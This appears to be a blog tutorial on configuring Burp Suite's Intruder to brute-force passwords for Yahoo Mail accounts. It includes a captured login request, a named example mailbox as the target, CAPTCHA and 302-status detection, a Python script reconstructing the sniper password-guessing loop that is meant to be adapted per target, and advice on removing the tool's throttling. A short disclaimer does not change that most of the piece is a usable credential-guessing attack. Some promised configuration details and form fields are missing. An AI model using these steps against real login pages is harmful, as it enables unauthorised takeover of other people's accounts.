Hacker's Delight: Burp Suite
For someone who has been a hacker for most of his life, there are few things more satisfying than finding a well-crafted and powerful tool that automates the tedious parts of the job.
Such is Burp Suite, a fast and well-documented app from Portswigger.net. Written in Java, the GUI is pure pleasure to use. You will need the Sun Java 1.6 development kit (JDK), including the "javac" and "java" binaries, properly installed first. If you don't have Java and you are serious about pen-testing, then you should get it anyway. Once the Sun package has been downloaded and installed on your (hopefully) Linux box, Burp Suite 1.2 can be downloaded directly from Portswigger at
and unpacked into its own folder. The command ./suite.bat will bring up the GUI (the suite is a plain Java jar, so running java -jar on the jar in that folder works as well).
For the purposes of this tutorial, I will use only the Burp Intruder functionality. Note, however, that this slick application has many other uses, including a sophisticated spider and a proxy that intercepts the browser's HTTP requests and responses so they can be edited in flight.
To begin, we fire up Burp Suite & click on the "Intruder" tab, and then select the "target" sub-tab. Here I have defined:
"use SSL": do NOT check
(Note that the specification of the Yahoo Mail server does not in any way suggest that I am endorsing the usage of Yahoo servers as targets. I merely chose it to illustrate the steps one must follow in order to configure Burp Suite for pentesting any target. Burp Suite was never used by the author in an actual attack on the Yahoo servers, nor does he condone its use for such purposes by anyone else.)
Next, click the Positions tab, which is the heart of Intruder. Here the contents of the request are entered. The attack type should be "sniper", and the first section, in the white text field, should be the headers:
POST /config/login? HTTP/1.1
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.04 (hardy) Firefox/3.0.6
(Note: These headers can be captured by aborting a post from the Yahoo log-in script at https://login.yahoo.com/config/login_verify2?&.src=ym Once the post is aborted, the raw request can be viewed with any tool that shows it (Burp's own proxy, or a browser add-on that displays live headers), then copied and pasted into Intruder with Ctrl-V.)
Following the headers, and still under the Positions tab, we must leave a blank line, as this is how HTTP separates the request headers from the body. The form fields can be gleaned from the Yahoo log-in page source, but I am including them here also:
The most relevant fields here are the email address, which is assigned to the "login" field (thaihoney28.yahoo.com in the above example), and the "passwd" field, which carries the login password and which I have enclosed in dollar signs. Burp Intruder actually uses a special symbol, the section sign (§), rather than dollar signs, when you click the Add "$" button on the right side of the panel. You can put anything you want between these markers, because once Intruder starts sending requests it replaces everything between them with the payloads.
The Payloads tab is thus used to specify our password list. Payloads can be defined in a number of ways, but the easiest is to select "preset list", click the Load button, and point it at a plain ASCII password list with one password per line (conventional CR/LF separators).
The salient feature of the Options tab is the grep/match list: strings that Intruder looks for in each server response and flags in the results table. In the case of Yahoo, if the password is wrong you will receive both "error" and "not found" in the response body for the first few dozen attempts. After about 10 to 30 failed attempts, Yahoo gets suspicious and demands ye olde image-verification characters (a CAPTCHA). These responses can be flagged by adding "in the image below" to the grep/match list. But there's not much you can do about them ultimately, at least not as far as I know.
If, however, the password is guessed correctly, then Intruder will show a 302 status code (an HTTP redirect) that sends the browser to the target's mailbox. The grep/match list can be used to flag specific strings from the login page, or the results view can be sorted by clicking the Status column header so that 302s appear on top, thus identifying a successful login. (There are probably other ways to signal a hit, but the most effective way I have found of acting on positive outcomes is to modify Portswigger's Java source code, as explained in the next paragraph.)
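To make the Positions/Payloads/Options workflow concrete, here is an added example (my own reconstruction for this article, not Portswigger's code) of what a sniper attack does: a request template with § markers, a payload list substituted one position at a time, Content-Length recomputed for each body, and the response rules from above (302 means hit, "error"/"not found" means miss, "in the image below" means the CAPTCHA has kicked in and the run should stop). The template, the payload list and the "server" are all constructed in the script so it runs with no network; the host name target.example is hypothetical, and the fake server simply behaves the way the article says Yahoo did.

```python
"""Burp Intruder 'sniper' mechanics, reconstructed offline.

Added example, not Portswigger's code. Request template, payload list
and the fake login endpoint are all constructed here; target.example is
a hypothetical host. The response rules mirror the article's description:
302 on success, "error"/"not found" on failure, a CAPTCHA page after a
run of failures.
"""
from typing import Callable, Iterator, List, Tuple
from urllib.parse import parse_qs, quote

MARK = "\u00a7"  # Intruder's payload marker (section sign); "Add $" inserts a pair

# Constructed template: the text between the markers is only a placeholder
# and is replaced wholesale, as the article says.
TEMPLATE = (
    "POST /config/login? HTTP/1.1\r\n"
    "Host: target.example\r\n"          # assumed host
    "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) "
    "Gecko/2009020911 Ubuntu/8.04 (hardy) Firefox/3.0.6\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
    f"login=user%40example.com&passwd={MARK}anything{MARK}"
)

CAPTCHA_MARK = "in the image below"
FAIL_MARKS = ("error", "not found")


def fix_content_length(raw: str) -> str:
    """Rewrite Content-Length to match the body. The blank line is the
    header/body boundary, so a template without one is rejected."""
    head, sep, body = raw.partition("\r\n\r\n")
    if not sep:
        raise ValueError("no blank line between headers and body")
    lines = [
        f"Content-Length: {len(body.encode())}"
        if line.lower().startswith("content-length:") else line
        for line in head.split("\r\n")
    ]
    return "\r\n".join(lines) + sep + body


def sniper(template: str, payloads: List[str]) -> Iterator[Tuple[int, str, str]]:
    """Yield (position, payload, request) in sniper order: every payload at
    position 0, then every payload at position 1, and so on. Untouched
    positions keep their placeholder text; payloads are URL-encoded because
    they land in a form body."""
    parts = template.split(MARK)
    if len(parts) % 2 == 0:
        raise ValueError("unbalanced payload markers")
    for pos in range(len(parts) // 2):
        for payload in payloads:
            pieces = [
                quote(payload, safe="") if (i % 2 == 1 and i // 2 == pos) else chunk
                for i, chunk in enumerate(parts)
            ]
            yield pos, payload, fix_content_length("".join(pieces))


def classify(status: int, body: str) -> str:
    """Options-tab logic: CAPTCHA page ends the run, 302 is a hit,
    a grep match on the failure strings is a miss."""
    if CAPTCHA_MARK in body:
        return "captcha"
    if status == 302:
        return "hit"
    if any(m in body for m in FAIL_MARKS):
        return "miss"
    return "unknown"


def run(template: str, payloads: List[str],
        send: Callable[[str], Tuple[int, str]]) -> List[Tuple[str, str]]:
    """Send each request and record (payload, verdict); stop at the first
    CAPTCHA, since further guesses would only be answered with more of them."""
    results = []
    for _, payload, request in sniper(template, payloads):
        verdict = classify(*send(request))
        results.append((payload, verdict))
        if verdict == "captcha":
            break
    return results


def make_fake_server(correct: str, captcha_after: int) -> Callable[[str], Tuple[int, str]]:
    """Constructed stand-in for the login endpoint: 302 on the right
    password, an error page otherwise, a CAPTCHA page after N failures."""
    failures = 0

    def send(request: str) -> Tuple[int, str]:
        nonlocal failures
        body = request.partition("\r\n\r\n")[2]
        passwd = parse_qs(body).get("passwd", [""])[0]
        if failures >= captcha_after:
            return 200, "<p>Type the characters in the image below</p>"
        if passwd == correct:
            return 302, ""
        failures += 1
        return 200, "<p>Invalid ID or password (error: not found)</p>"

    return send


if __name__ == "__main__":
    server = make_fake_server("letmein", captcha_after=3)
    for payload, verdict in run(TEMPLATE, ["123456", "letmein", "password"], server):
        print(f"{payload:12} {verdict}")
```

The 302-on-success rule is what the article observed for Yahoo at the time; other applications signal a good login differently (a 200 with a different content length, a Set-Cookie header, a missing error string), so the classify function is the part you adapt per target. The Content-Length rewrite matters whenever payload lengths vary: a stale length makes the server truncate or wait on the body, which shows up as a wall of identical "unknown" results rather than a clean hit/miss split.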
Now, the caveats. Portswigger has time-throttled Intruder in the free edition, and the submissions are intolerably slow. Don't expect to crack any Yahoo mailboxes with it. So you have a choice here: (1) buy a Portswigger licence for a couple of hundred pounds (chump change for a hacker, right? he he), or (2) buy "The Web Application Hacker's Handbook" and get Java source code that can be modified to remove the throttling and add custom notification of successful hits. If there is enough interest in this article, I will consider writing another one explaining how to do this.
While not ultimately successful against the big boys like Yahoo, Burp Suite is one fine tool in the pentester's toolbox and will succeed against many other targets. Many kudos to its author(s).
All ideas about all this are welcomed.
Your humble servant, Whistler.